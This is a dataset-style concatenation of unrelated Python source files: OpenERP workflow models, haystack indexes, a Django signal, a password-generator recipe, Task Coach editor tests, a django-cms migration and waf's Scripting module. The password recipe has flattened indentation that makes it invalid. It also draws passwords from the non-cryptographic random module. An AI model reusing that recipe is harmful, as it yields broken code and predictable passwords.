        'signal': fields.char('Signal (Button Name)', size=64,
                              help="When the operation of transition comes from a button pressed in the client form, "\
                              "signal tests the name of the pressed button. If signal is NULL, no button is necessary to validate this transition."),
        'group_id': fields.many2one('res.groups', 'Group Required',
                                    help="The group that a user must have to be authorized to validate this transition."),
        'condition': fields.char('Condition', required=True, size=128,
                                 help="Expression to be satisfied if we want the transition done."),
        'act_from': fields.many2one('workflow.activity', 'Source Activity', required=True, select=True, ondelete='cascade',
                                    help="Source activity. When this activity is over, the condition is tested to determine if we can start the ACT_TO activity."),
        'act_to': fields.many2one('workflow.activity', 'Destination Activity', required=True, select=True, ondelete='cascade',
                                  help="The destination activity."),
        # Denormalized workflow reference, derived from the source activity.
        'wkf_id': fields.related('act_from','wkf_id', type='many2one', relation='workflow', string='Workflow', select=True),
    }
    _defaults = {
        # Default condition always passes.
        'condition': lambda *a: 'True',
    }
wkf_transition()
class wkf_instance(osv.osv):
    """One running workflow, bound to a record via (res_type, res_id)."""
    _table = "wkf_instance"
    _name = "workflow.instance"
    _rec_name = 'res_type'
    # Engine-managed table: no create/write audit columns.
    _log_access = False
    _columns = {
        'wkf_id': fields.many2one('workflow', 'Workflow', ondelete='cascade', select=True),
        'res_id': fields.integer('Resource ID'),
        'res_type': fields.char('Resource Object', size=64),
        'state': fields.char('Status', size=32),
    }

    def _auto_init(self, cr, context=None):
        # Composite indexes the ORM does not create on its own; needed for
        # the engine's lookups by record and by (record, workflow).
        super(wkf_instance, self)._auto_init(cr, context)
        cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \'wkf_instance_res_type_res_id_state_index\'')
        if not cr.fetchone():
            cr.execute('CREATE INDEX wkf_instance_res_type_res_id_state_index ON wkf_instance (res_type, res_id, state)')
        cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \'wkf_instance_res_id_wkf_id_index\'')
        if not cr.fetchone():
            cr.execute('CREATE INDEX wkf_instance_res_id_wkf_id_index ON wkf_instance (res_id, wkf_id)')
wkf_instance()
class wkf_workitem(osv.osv):
    """A token marking an active activity inside a workflow instance."""
    _table = "wkf_workitem"
    _name = "workflow.workitem"
    # Engine-managed table: no create/write audit columns.
    _log_access = False
    _rec_name = 'state'
    _columns = {
        'act_id': fields.many2one('workflow.activity', 'Activity', required=True, ondelete="cascade", select=True),
        # Denormalized workflow reference, derived from the activity.
        'wkf_id': fields.related('act_id','wkf_id', type='many2one', relation='workflow', string='Workflow'),
        # Set when the activity spawned a subflow instance this item waits on.
        'subflow_id': fields.many2one('workflow.instance', 'Subflow', ondelete="cascade", select=True),
        'inst_id': fields.many2one('workflow.instance', 'Instance', required=True, ondelete="cascade", select=True),
        'state': fields.char('Status', size=64, select=True),
    }
wkf_workitem()
class wkf_triggers(osv.osv):
    """Links a waiting workitem to the record that can re-trigger its evaluation."""
    _table = "wkf_triggers"
    _name = "workflow.triggers"
    # Engine-managed table: no create/write audit columns.
    _log_access = False
    _columns = {
        'res_id': fields.integer('Resource ID', size=128),
        'model': fields.char('Object', size=128),
        'instance_id': fields.many2one('workflow.instance', 'Destination Instance', ondelete="cascade"),
        'workitem_id': fields.many2one('workflow.workitem', 'Workitem', required=True, ondelete="cascade"),
    }

    def _auto_init(self, cr, context=None):
        # Composite index for trigger lookups by (res_id, model).
        super(wkf_triggers, self)._auto_init(cr, context)
        cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \'wkf_triggers_res_id_model_index\'')
        if not cr.fetchone():
            cr.execute('CREATE INDEX wkf_triggers_res_id_model_index ON wkf_triggers (res_id, model)')
wkf_triggers()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| tedi3231/openerp | openerp/addons/base/ir/workflow/workflow.py | Python | agpl-3.0 | 8,979 |
from haystack import indexes
from haystack import site
from dinette.models import Ftopics, Reply, DinetteUserProfile
class TopicIndex(indexes.SearchIndex):
    """Haystack index for forum topics."""
    # Main full-text document, rendered from a search template.
    text = indexes.CharField(document=True, use_template=True)
    subject = indexes.CharField(model_attr="subject")
    # Indexes the pre-rendered message markup, not the raw source.
    message = indexes.CharField(model_attr="_message_rendered")


class ReplyIndex(indexes.SearchIndex):
    """Haystack index for topic replies."""
    text = indexes.CharField(document=True, use_template=True)
    message = indexes.CharField(model_attr="_message_rendered")


class UserprofileIndex(indexes.SearchIndex):
    """Haystack index for user profiles, searchable by name fields."""
    text = indexes.CharField(document=True, use_template=True)
    username = indexes.CharField(model_attr="username")
    first_name = indexes.CharField(model_attr="first_name")
    last_name = indexes.CharField(model_attr="last_name")


# Register each model with its index so haystack includes it in searches.
site.register(Ftopics, TopicIndex)
site.register(Reply, ReplyIndex)
site.register(DinetteUserProfile, UserprofileIndex)
| agiliq/Dinette | dinette/search_indexes.py | Python | bsd-3-clause | 922 |
# -*- coding: utf-8 -*-
from django.dispatch import Signal
post_ondelta_signal = Signal(providing_args=['fields_changed', 'instance'])
| adamhaney/django-ondelta | ondelta/signals.py | Python | mit | 136 |
#!/usr/bin/env python
"""
A simple script for making random passwords, WITHOUT 1,l,O,0. Because
those characters are hard to tell the difference between in some fonts.
"""
#Import Modules
import sys
from random import Random
rng = Random()
righthand = '23456qwertasdfgzxcvbQWERTASDFGZXCVB'
lefthand = '789yuiophjknmYUIPHJKLNM'
allchars = righthand + lefthand
try:
passwordLength = int(sys.argv[1])
except:
#user didn't specify a length. that's ok, just use 8
passwordLength = 8
try:
alternate_hands = sys.argv[2] == 'alt'
if not alternate_hands:
print "USAGE:"
print sys.argv[0], "[length of password]",
print "[alt (if you want the password to alternate hands]"
except:
alternate_hands = False
for i in range(passwordLength):
if not alternate_hands:
sys.stdout.write( rng.choice(allchars) )
else:
if i%2:
sys.stdout.write( rng.choice(lefthand) )
else:
sys.stdout.write( rng.choice(righthand) )
| ActiveState/code | recipes/Python/473852_Password_Generator/recipe-473852.py | Python | mit | 929 |
'''
Task Coach - Your friendly task manager
Copyright (C) 2004-2010 Task Coach developers <developers@taskcoach.org>
Task Coach is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Task Coach is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import wx, sys
import test
from taskcoachlib import gui, command, config, persistence
from taskcoachlib.domain import category, note, attachment
class CategoryEditorTestCase(test.wxTestCase):
    """Shared fixture: a task file with categories and an open CategoryEditor."""

    def setUp(self):
        super(CategoryEditorTestCase, self).setUp()
        self.settings = config.Settings(load=False)
        self.taskFile = persistence.TaskFile()
        self.categories = self.taskFile.categories()
        # Subclasses supply the fixture categories via createCategories().
        self.categories.extend(self.createCategories())
        self.editor = self.createEditor()

    def createEditor(self):
        return gui.dialog.editor.CategoryEditor(self.frame, self.createCommand(),
            self.settings, self.categories, self.taskFile, raiseDialog=False)

    def tearDown(self):
        # CategoryEditor uses CallAfter for setting the focus, make sure those
        # calls are dealt with, otherwise they'll turn up in other tests
        if '__WXMAC__' not in wx.PlatformInfo and ('__WXMSW__' not in wx.PlatformInfo or sys.version_info < (2, 5)):
            wx.Yield() # pragma: no cover
        super(CategoryEditorTestCase, self).tearDown()

    def createCommand(self):
        # Subclasses must return the command under test.
        raise NotImplementedError # pragma: no cover

    def createCategories(self):
        # Default: no fixture categories; subclasses override.
        return []

    def setSubject(self, newSubject):
        # _interior[0] is the editor's subject/description page.
        self.editor._interior[0].setSubject(newSubject)

    def setDescription(self, newDescription):
        self.editor._interior[0].setDescription(newDescription)
class NewCategoryTest(CategoryEditorTestCase):
    """Editor behaviour when creating a brand new category."""

    def createCommand(self):
        newCategoryCommand = command.NewCategoryCommand(self.categories)
        self.category = newCategoryCommand.items[0] # pylint: disable-msg=W0201
        return newCategoryCommand

    def testCreate(self):
        # pylint: disable-msg=W0212
        self.assertEqual('New category', self.editor._interior[0]._subjectEntry.GetValue())

    def testOk(self):
        # ok() must commit the edited subject to the category.
        self.setSubject('Done')
        self.editor.ok()
        self.assertEqual('Done', self.category.subject())

    def testCancel(self):
        # cancel() must discard the edited subject.
        self.setSubject('Done')
        self.editor.cancel()
        self.assertEqual('New category', self.category.subject())

    def testSetDescription(self):
        self.setDescription('Description')
        self.editor.ok()
        self.assertEqual('Description', self.category.description())

    def testAddNote(self):
        # _interior[1] is the editor's notes page.
        self.editor._interior[1].notes.append(note.Note(subject='New note'))
        self.editor.ok()
        self.assertEqual(1, len(self.category.notes()))
class NewSubCategoryTest(CategoryEditorTestCase):
    """Editor behaviour when creating a subcategory of an existing category."""

    def createCommand(self):
        newSubCategoryCommand = command.NewSubCategoryCommand(self.categories,
            [self.category])
        self.subCategory = newSubCategoryCommand.items[0] # pylint: disable-msg=W0201
        return newSubCategoryCommand

    def createCategories(self):
        # Parent category the new subcategory is attached to.
        self.category = category.Category('Category') # pylint: disable-msg=W0201
        return [self.category]

    def testOk(self):
        self.editor.ok()
        self.assertEqual([self.subCategory], self.category.children())

    def testCancel(self):
        # cancel() must leave the parent without children.
        self.editor.cancel()
        self.assertEqual([], self.category.children())
class EditCategoryTest(CategoryEditorTestCase):
    """Editor behaviour when editing an existing category (with an attachment)."""

    def setUp(self):
        super(EditCategoryTest, self).setUp()
        # Every test starts with the subject already changed in the editor.
        self.setSubject('Done')

    def createCommand(self):
        return command.EditCategoryCommand(self.categories, [self.category])

    # pylint: disable-msg=E1101
    def createCategories(self):
        # pylint: disable-msg=W0201
        self.category = category.Category('Category to edit')
        self.attachment = attachment.FileAttachment('some attachment')
        self.category.addAttachments(self.attachment)
        return [self.category]

    def testOk(self):
        self.editor.ok()
        self.assertEqual('Done', self.category.subject())

    def testCancel(self):
        self.editor.cancel()
        self.assertEqual('Category to edit', self.category.subject())

    def testAddAttachment(self):
        # _interior[2] is the editor's attachments page; dropping a file
        # must create an attachment with matching location and subject.
        self.editor._interior[2].viewer.onDropFiles(None, ['filename'])
        self.editor.ok()
        self.failUnless('filename' in [att.location() for att in self.category.attachments()])
        self.failUnless('filename' in [att.subject() for att in self.category.attachments()])

    def testRemoveAttachment(self):
        self.editor._interior[2].viewer.presentation().removeItems([self.attachment])
        self.editor.ok()
        self.assertEqual([], self.category.attachments())
| wdmchaft/taskcoach | tests/unittests/guiTests/CategoryEditorTest.py | Python | gpl-3.0 | 5,369 |
# -*- coding: utf-8 -*-
from south.db import db
from django.db import models
from cms.models import *
import datetime
class Migration:
    """South schema migration: add SEO meta fields to the cms ``Title`` model."""

    def forwards(self, orm):
        # Adding field 'Title.meta_keywords'
        db.add_column('cms_title', 'meta_keywords', models.CharField(_("keywords"), max_length=255, blank=True, null=True))

        # Adding field 'Title.meta_description'
        db.add_column('cms_title', 'meta_description', models.TextField(_("description"), max_length=255, blank=True, null=True))

    def backwards(self, orm):
        # Deleting field 'Title.meta_keywords'
        db.delete_column('cms_title', 'meta_keywords')

        # Deleting field 'Title.meta_description'
        db.delete_column('cms_title', 'meta_description')

    # Frozen ORM snapshot used by South at migration time; generated code,
    # do not edit by hand.
    models = {
        'sites.site': {
            'Meta': {'ordering': "('domain',)", 'db_table': "'django_site'"},
            '_stub': True,
            'id': ('models.AutoField', [], {'primary_key': 'True'})
        },
        'auth.user': {
            '_stub': True,
            'id': ('models.AutoField', [], {'primary_key': 'True'})
        },
        'cms.pagepermission': {
            'can_change_softroot': ('models.BooleanField', ['_("can change soft-root")'], {'default': 'False'}),
            'can_edit': ('models.BooleanField', ['_("can edit")'], {'default': 'True'}),
            'can_publish': ('models.BooleanField', ['_("can publish")'], {'default': 'True'}),
            'everybody': ('models.BooleanField', ['_("everybody")'], {'default': 'False'}),
            'group': ('models.ForeignKey', ['Group'], {'null': 'True', 'blank': 'True'}),
            'id': ('models.AutoField', [], {'primary_key': 'True'}),
            'page': ('models.ForeignKey', ['Page'], {'null': 'True', 'blank': 'True'}),
            'type': ('models.IntegerField', ['_("type")'], {'default': '0'}),
            'user': ('models.ForeignKey', ['User'], {'null': 'True', 'blank': 'True'})
        },
        'cms.title': {
            'Meta': {'unique_together': "(('language','page'),)"},
            'application_urls': ('models.CharField', ["_('application')"], {'blank': 'True', 'max_length': '200', 'null': 'True', 'db_index': 'True'}),
            'creation_date': ('models.DateTimeField', ['_("creation date")'], {'default': 'datetime.datetime.now', 'editable': 'False'}),
            'has_url_overwrite': ('models.BooleanField', ['_("has url overwrite")'], {'default': 'False', 'editable': 'False', 'db_index': 'True'}),
            'id': ('models.AutoField', [], {'primary_key': 'True'}),
            'language': ('models.CharField', ['_("language")'], {'max_length': '3', 'db_index': 'True'}),
            'meta_description': ('models.TextField', ['_("description")'], {'max_length': '255', 'blank': 'True', 'null':'True'}),
            'meta_keywords': ('models.CharField', ['_("keywords")'], {'max_length': '255', 'blank': 'True', 'null':'True'}),
            'page': ('models.ForeignKey', ['Page'], {'related_name': '"title_set"'}),
            'path': ('models.CharField', ['_("path")'], {'max_length': '255', 'db_index': 'True'}),
            'redirect': ('models.CharField', ['_("redirect")'], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'slug': ('models.SlugField', ['_("slug")'], {'unique': 'False', 'max_length': '255', 'db_index': 'True'}),
            'title': ('models.CharField', ['_("title")'], {'max_length': '255'})
        },
        'cms.cmsplugin': {
            'creation_date': ('models.DateTimeField', ['_("creation date")'], {'default': 'datetime.datetime.now', 'editable': 'False'}),
            'id': ('models.AutoField', [], {'primary_key': 'True'}),
            'language': ('models.CharField', ['_("language")'], {'db_index': 'True', 'max_length': '3', 'editable': 'False', 'blank': 'False'}),
            'level': ('models.PositiveIntegerField', [],{'db_index':'True', 'editable':'False'}),
            'lft': ('models.PositiveIntegerField', [],{'db_index':'True', 'editable':'False'}),
            'page': ('models.ForeignKey', ['Page'], {'editable': 'False'}),
            'parent': ('models.ForeignKey', ['CMSPlugin'], {'null': 'True', 'editable': 'False', 'blank': 'True'}),
            'placeholder': ('models.CharField', ['_("slot")'], {'max_length': '50', 'editable': 'False', 'db_index': 'True'}),
            'plugin_type': ('models.CharField', ['_("plugin_name")'], {'max_length': '50', 'editable': 'False', 'db_index': 'True'}),
            'position': ('models.PositiveSmallIntegerField', ['_("position")'], {'null': 'True', 'editable': 'False', 'blank': 'True'}),
            'rght': ('models.PositiveIntegerField', [],{'db_index':'True', 'editable':'False'}),
            'tree_id': ('models.PositiveIntegerField', [],{'db_index':'True', 'editable':'False'})
        },
        'cms.page': {
            'Meta': {'ordering': "('tree_id','lft')"},
            'author': ('models.ForeignKey', ['User'], {'limit_choices_to': "{'page__isnull':False}"}),
            'creation_date': ('models.DateTimeField', [], {'default': 'datetime.datetime.now', 'editable': 'False'}),
            'id': ('models.AutoField', [], {'primary_key': 'True'}),
            'in_navigation': ('models.BooleanField', ['_("in navigation")'], {'default': 'True', 'db_index': 'True'}),
            'level': ('models.PositiveIntegerField', [],{'db_index':'True', 'editable':'False'}),
            'lft': ('models.PositiveIntegerField', [],{'db_index':'True', 'editable':'False'}),
            'login_required': ('models.BooleanField', ["_('login required')"], {'default': 'False'}),
            'navigation_extenders': ('models.CharField', ['_("navigation extenders")'], {'blank': 'True', 'max_length': '80', 'null': 'True', 'db_index': 'True'}),
            'parent': ('models.ForeignKey', ['Page'], {'db_index': 'True', 'related_name': "'children'", 'null': 'True', 'blank': 'True'}),
            'publication_date': ('models.DateTimeField', ['_("publication date")'], {'null': 'True', 'db_index': 'True', 'blank': 'True'}),
            'publication_end_date': ('models.DateTimeField', ['_("publication end date")'], {'null': 'True', 'db_index': 'True', 'blank': 'True'}),
            'reverse_id': ('models.CharField', ['_("id")'], {'blank': 'True', 'max_length': '40', 'null': 'True', 'db_index': 'True'}),
            'rght': ('models.PositiveIntegerField', [],{'db_index':'True', 'editable':'False'}),
            'sites': ('models.ManyToManyField', ['Site'], {}),
            'soft_root': ('models.BooleanField', ['_("soft root")'], {'default': 'False', 'db_index': 'True'}),
            'status': ('models.IntegerField', ['_("status")'], {'default': '0', 'db_index': 'True'}),
            'template': ('models.CharField', ['_("template")'], {'max_length': '100'}),
            'tree_id': ('models.PositiveIntegerField', [],{'db_index':'True', 'editable':'False'})
        },
        'auth.group': {
            '_stub': True,
            'id': ('models.AutoField', [], {'primary_key': 'True'})
        }
    }

    complete_apps = ['cms']
| team-xue/xue | xue/cms/migrations/0009_added_meta_fields.py | Python | bsd-3-clause | 7,114 |
#! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import os,shlex,shutil,traceback,errno,sys,stat
from waflib import Utils,Configure,Logs,Options,ConfigSet,Context,Errors,Build,Node
# Overrides the build directory when set by a tool/extension (None = default).
build_dir_override=None
# Commands that must not trigger the upward directory climb for a lock file.
no_climb_commands=['configure']
# Command executed when none is given on the command line.
default_cmd="build"
def waf_entry_point(current_directory, version, wafdir):
    """Main waf entry point: locate the project, load the wscript, run commands.

    :param current_directory: directory waf was invoked from
    :param version: version string of the waf script (must match the library)
    :param wafdir: directory containing the waflib package

    Fix: the legacy ``except E, e`` syntax (removed in Python 3) is replaced
    by ``except E as e``, which is valid on Python 2.6+ and 3.x alike.
    """
    Logs.init_log()
    # Refuse to run when the waf script and the waflib library disagree.
    if Context.WAFVERSION != version:
        Logs.error('Waf script %r and library %r do not match (directory %r)' % (version, Context.WAFVERSION, wafdir))
        sys.exit(1)
    if '--version' in sys.argv:
        Context.run_dir = current_directory
        ctx = Context.create_context('options')
        ctx.curdir = current_directory
        ctx.parse_args()
        sys.exit(0)
    Context.waf_dir = wafdir
    Context.launch_dir = current_directory
    # Commands such as 'configure' must not climb up looking for a lock file.
    no_climb = os.environ.get('NOCLIMB', None)
    if not no_climb:
        for k in no_climb_commands:
            if k in sys.argv:
                no_climb = True
                break
    # Walk up from the launch directory looking for a lock file or a wscript.
    cur = current_directory
    while cur:
        lst = os.listdir(cur)
        if Options.lockfile in lst:
            env = ConfigSet.ConfigSet()
            try:
                env.load(os.path.join(cur, Options.lockfile))
                ino = os.stat(cur)[stat.ST_INO]
            except Exception:
                pass
            else:
                # Accept the lock file only if one of the recorded directories
                # points back at this directory (inode comparison; plain path
                # comparison on win32 where inodes are meaningless).
                for x in [env.run_dir, env.top_dir, env.out_dir]:
                    if Utils.is_win32:
                        if cur == x:
                            load = True
                            break
                    else:
                        try:
                            ino2 = os.stat(x)[stat.ST_INO]
                        except OSError:
                            pass
                        else:
                            if ino == ino2:
                                load = True
                                break
                else:
                    Logs.warn('invalid lock file in %s' % cur)
                    load = False
                if load:
                    Context.run_dir = env.run_dir
                    Context.top_dir = env.top_dir
                    Context.out_dir = env.out_dir
                    break
        if not Context.run_dir:
            if Context.WSCRIPT_FILE in lst:
                Context.run_dir = cur
        next = os.path.dirname(cur)
        if next == cur:
            # Reached the filesystem root.
            break
        cur = next
        if no_climb:
            break
    if not Context.run_dir:
        if '-h' in sys.argv or '--help' in sys.argv:
            Logs.warn('No wscript file found: the help message may be incomplete')
            Context.run_dir = current_directory
            ctx = Context.create_context('options')
            ctx.curdir = current_directory
            ctx.parse_args()
            sys.exit(0)
        Logs.error('Waf: Run from a directory containing a file named %r' % Context.WSCRIPT_FILE)
        sys.exit(1)
    try:
        os.chdir(Context.run_dir)
    except OSError:
        Logs.error('Waf: The folder %r is unreadable' % Context.run_dir)
        sys.exit(1)
    try:
        set_main_module(Context.run_dir + os.sep + Context.WSCRIPT_FILE)
    except Errors.WafError as e:
        Logs.pprint('RED', e.verbose_msg)
        Logs.error(str(e))
        sys.exit(1)
    except Exception as e:
        Logs.error('Waf: The wscript in %r is unreadable' % Context.run_dir, e)
        traceback.print_exc(file=sys.stdout)
        sys.exit(2)
    try:
        run_commands()
    except Errors.WafError as e:
        if Logs.verbose > 1:
            Logs.pprint('RED', e.verbose_msg)
        Logs.error(e.msg)
        sys.exit(1)
    except SystemExit:
        raise
    except Exception as e:
        traceback.print_exc(file=sys.stdout)
        sys.exit(2)
    except KeyboardInterrupt:
        # NOTE: reachable because KeyboardInterrupt derives from BaseException,
        # not Exception; kept after the generic handler as in the original.
        Logs.pprint('RED', 'Interrupted')
        sys.exit(68)
def set_main_module(file_path):
    """Load the project wscript as ``Context.g_module`` and fill in defaults.

    Missing command functions (update/dist/distclean/distcheck) are bound onto
    the module; init/shutdown/options default to no-ops.
    """
    Context.g_module = Context.load_module(file_path)
    Context.g_module.root_path = file_path
    def set_def(obj):
        # Bind obj on the wscript module unless the user already defined it.
        name = obj.__name__
        if name not in Context.g_module.__dict__:
            setattr(Context.g_module, name, obj)
    # 'update' was listed twice in the original sequence; once is enough
    # (the second call was a no-op since the name was already bound).
    for k in [update, dist, distclean, distcheck]:
        set_def(k)
    if 'init' not in Context.g_module.__dict__:
        Context.g_module.init = Utils.nada
    if 'shutdown' not in Context.g_module.__dict__:
        Context.g_module.shutdown = Utils.nada
    if 'options' not in Context.g_module.__dict__:
        Context.g_module.options = Utils.nada
def parse_options():
    """Parse the command line, then configure logging verbosity and zones."""
    Context.create_context('options').execute()
    if not Options.commands:
        Options.commands = [default_cmd]
    Options.commands = [cmd for cmd in Options.commands if cmd != 'options']
    Logs.verbose = Options.options.verbose
    Logs.init_log()
    zones = Options.options.zones
    if zones:
        Logs.zones = zones.split(',')
        if not Logs.verbose:
            Logs.verbose = 1
    elif Logs.verbose > 0:
        Logs.zones = ['runner']
    if Logs.verbose > 2:
        Logs.zones = ['*']
def run_command(cmd_name):
    """Create, configure and execute the context for *cmd_name*; return it."""
    context = Context.create_context(cmd_name)
    context.log_timer = Utils.Timer()
    context.options = Options.options
    context.cmd = cmd_name
    context.execute()
    return context
def run_commands():
    """Parse options, then run init, each queued command, and shutdown."""
    parse_options()
    run_command('init')
    while Options.commands:
        name = Options.commands.pop(0)
        timed_ctx = run_command(name)
        Logs.info('%r finished successfully (%s)' % (name, str(timed_ctx.log_timer)))
    run_command('shutdown')
def _can_distclean(name):
for k in'.o .moc .exe'.split():
if name.endswith(k):
return True
return False
def distclean_dir(dirname):
    """Remove build artifacts below *dirname* (used when out_dir == top_dir)."""
    for dirpath, _, filenames in os.walk(dirname):
        for name in filenames:
            if not _can_distclean(name):
                continue
            target = dirpath + os.sep + name
            try:
                os.unlink(target)
            except OSError:
                Logs.warn('Could not remove %r' % target)
    # Also drop the cache database and the configuration log.
    for leftover in [Context.DBFILE, 'config.log']:
        try:
            os.unlink(leftover)
        except OSError:
            pass
    try:
        shutil.rmtree('c4che')
    except OSError:
        pass
def distclean(ctx):
    '''removes the build directory'''
    # Fix: the legacy 'except E, e' syntax (invalid in Python 3) is replaced
    # with 'except E as e' (valid on 2.6+ and 3.x).  Behavior is unchanged.
    lst = os.listdir('.')
    for f in lst:
        if f == Options.lockfile:
            try:
                proj = ConfigSet.ConfigSet(f)
            except IOError:
                Logs.warn('Could not read %r' % f)
                continue
            if proj['out_dir'] != proj['top_dir']:
                # Separate build directory: remove it wholesale.
                try:
                    shutil.rmtree(proj['out_dir'])
                except IOError:
                    pass
                except OSError as e:
                    if e.errno != errno.ENOENT:
                        Logs.warn('project %r cannot be removed' % proj[Context.OUT])
            else:
                # In-source build: only delete recognized build artifacts.
                distclean_dir(proj['out_dir'])
            for k in (proj['out_dir'], proj['top_dir'], proj['run_dir']):
                try:
                    os.remove(os.path.join(k, Options.lockfile))
                except OSError as e:
                    if e.errno != errno.ENOENT:
                        Logs.warn('file %r cannot be removed' % f)
        # Remove the unpacked waf directories when no command follows.
        if f.startswith('.waf') and not Options.commands:
            shutil.rmtree(f, ignore_errors=True)
class Dist(Context.Context):
    '''creates an archive containing the project source code'''
    cmd = 'dist'
    fun = 'dist'
    # Default archive format; ext_algo can map an algo to a custom extension.
    algo = 'tar.bz2'
    ext_algo = {}
    def execute(self):
        # Run the project's dist() function, then build the archive.
        self.recurse([os.path.dirname(Context.g_module.root_path)])
        self.archive()
    def archive(self):
        """Create the tar/zip archive and log its sha1 digest."""
        import tarfile
        arch_name = self.get_arch_name()
        try:
            self.base_path
        except AttributeError:
            self.base_path = self.path
        node = self.base_path.make_node(arch_name)
        try:
            node.delete()
        except Exception:
            pass
        files = self.get_files()
        if self.algo.startswith('tar.'):
            tar = tarfile.open(arch_name, 'w:' + self.algo.replace('tar.', ''))
            for x in files:
                self.add_tar_file(x, tar)
            tar.close()
        elif self.algo == 'zip':
            import zipfile
            # Fix: renamed from 'zip' to avoid shadowing the builtin.
            zf = zipfile.ZipFile(arch_name, 'w', compression=zipfile.ZIP_DEFLATED)
            for x in files:
                archive_name = self.get_base_name() + '/' + x.path_from(self.base_path)
                zf.write(x.abspath(), archive_name, zipfile.ZIP_DEFLATED)
            zf.close()
        else:
            self.fatal('Valid algo types are tar.bz2, tar.gz or zip')
        try:
            from hashlib import sha1 as sha
        except ImportError:
            # Very old interpreters only; hashlib exists on 2.5+.
            from sha import sha
        try:
            digest = " (sha=%r)" % sha(node.read()).hexdigest()
        except Exception:
            digest = ''
        Logs.info('New archive created: %s%s' % (self.arch_name, digest))
    def get_tar_path(self, node):
        # Hook point: the on-disk file actually added for a given node.
        return node.abspath()
    def add_tar_file(self, x, tar):
        """Add node *x* to *tar* with normalized root ownership."""
        p = self.get_tar_path(x)
        tinfo = tar.gettarinfo(name=p, arcname=self.get_tar_prefix() + '/' + x.path_from(self.base_path))
        tinfo.uid = 0
        tinfo.gid = 0
        tinfo.uname = 'root'
        tinfo.gname = 'root'
        fu = None
        try:
            fu = open(p, 'rb')
            tar.addfile(tinfo, fileobj=fu)
        finally:
            if fu:
                fu.close()
    def get_tar_prefix(self):
        # Directory prefix inside the archive (defaults to the base name).
        try:
            return self.tar_prefix
        except AttributeError:
            return self.get_base_name()
    def get_arch_name(self):
        # Cache the archive file name, e.g. 'app-1.0.tar.bz2'.
        try:
            self.arch_name
        except AttributeError:
            self.arch_name = self.get_base_name() + '.' + self.ext_algo.get(self.algo, self.algo)
        return self.arch_name
    def get_base_name(self):
        # '<appname>-<version>' read from the wscript module, with fallbacks.
        try:
            self.base_name
        except AttributeError:
            appname = getattr(Context.g_module, Context.APPNAME, 'noname')
            version = getattr(Context.g_module, Context.VERSION, '1.0')
            self.base_name = appname + '-' + version
        return self.base_name
    def get_excl(self):
        """Return the ant_glob exclusion patterns, including the build dir."""
        try:
            return self.excl
        except AttributeError:
            self.excl = Node.exclude_regs + ' **/waf-1.7.* **/.waf-1.7* **/waf3-1.7.* **/.waf3-1.7* **/*~ **/*.rej **/*.orig **/*.pyc **/*.pyo **/*.bak **/*.swp **/.lock-w*'
            nd = self.root.find_node(Context.out_dir)
            if nd:
                self.excl += ' ' + nd.path_from(self.base_path)
            return self.excl
    def get_files(self):
        # An explicit self.files wins; otherwise glob everything not excluded.
        try:
            files = self.files
        except AttributeError:
            files = self.base_path.ant_glob('**/*', excl=self.get_excl())
        return files
def dist(ctx):
    '''makes a tarball for redistributing the sources'''
    # Placeholder bound onto the wscript module; the Dist context class
    # performs the actual archiving.
    pass
class DistCheck(Dist):
    # Creates the source archive, then verifies that it configures, installs
    # and uninstalls cleanly.
    fun = 'distcheck'
    cmd = 'distcheck'
    def execute(self):
        # Same as Dist.execute, plus the build/install/uninstall check.
        self.recurse([os.path.dirname(Context.g_module.root_path)])
        self.archive()
        self.check()
    def check(self):
        """Extract the archive and run configure/install/uninstall inside it."""
        import tempfile, tarfile
        archive = None
        try:
            archive = tarfile.open(self.get_arch_name())
            # NOTE(review): extracts the archive this process just created;
            # member paths are not sanitized, so do not reuse this on
            # untrusted tarballs.
            for member in archive:
                archive.extract(member)
        finally:
            if archive:
                archive.close()
        if Options.options.distcheck_args:
            cfg = shlex.split(Options.options.distcheck_args)
        else:
            cfg = [x for x in sys.argv if x.startswith('-')]
        instdir = tempfile.mkdtemp('.inst', self.get_base_name())
        ret = Utils.subprocess.Popen([sys.argv[0], 'configure', 'install', 'uninstall', '--destdir=' + instdir] + cfg, cwd=self.get_base_name()).wait()
        if ret:
            raise Errors.WafError('distcheck failed with code %i' % ret)
        if os.path.exists(instdir):
            raise Errors.WafError('distcheck succeeded, but files were left in %s' % instdir)
        shutil.rmtree(self.get_base_name())
def distcheck(ctx):
    '''checks if the project compiles (tarball from 'dist')'''
    # Placeholder bound onto the wscript module; DistCheck does the real work.
    pass
def update(ctx):
    '''updates the plugins from the *waflib/extras* directory'''
    tools = Options.options.files.split(',')
    if not tools:
        # No explicit list given: refresh every extra tool present locally.
        tools = [x for x in Utils.listdir(Context.waf_dir + '/waflib/extras') if x.endswith('.py')]
    for fname in tools:
        toolname = fname.replace('.py', '')
        try:
            Configure.download_tool(toolname, force=True, ctx=ctx)
        except Errors.WafError:
            Logs.error('Could not find the tool %s in the remote repository' % fname)
def autoconfigure(execute_method):
    """Decorator: re-run 'configure' automatically before the wrapped command
    when the lock file is missing, stale, or recorded for another directory.
    """
    def execute(self):
        if not Configure.autoconfig:
            return execute_method(self)
        env = ConfigSet.ConfigSet()
        do_config = False
        try:
            env.load(os.path.join(Context.top_dir, Options.lockfile))
        except Exception:
            Logs.warn('Configuring the project')
            do_config = True
        else:
            if env.run_dir != Context.run_dir:
                do_config = True
            else:
                # Re-hash the files recorded at configure time to detect edits.
                digest = 0
                for path in env['files']:
                    digest = hash((digest, Utils.readf(path, 'rb')))
                do_config = digest != env.hash
        if do_config:
            # Queue 'configure' followed by the original command and bail out.
            Options.commands.insert(0, self.cmd)
            Options.commands.insert(0, 'configure')
            return
        return execute_method(self)
    return execute
# Wrap BuildContext.execute so builds trigger autoconfiguration when enabled.
Build.BuildContext.execute=autoconfigure(Build.BuildContext.execute)
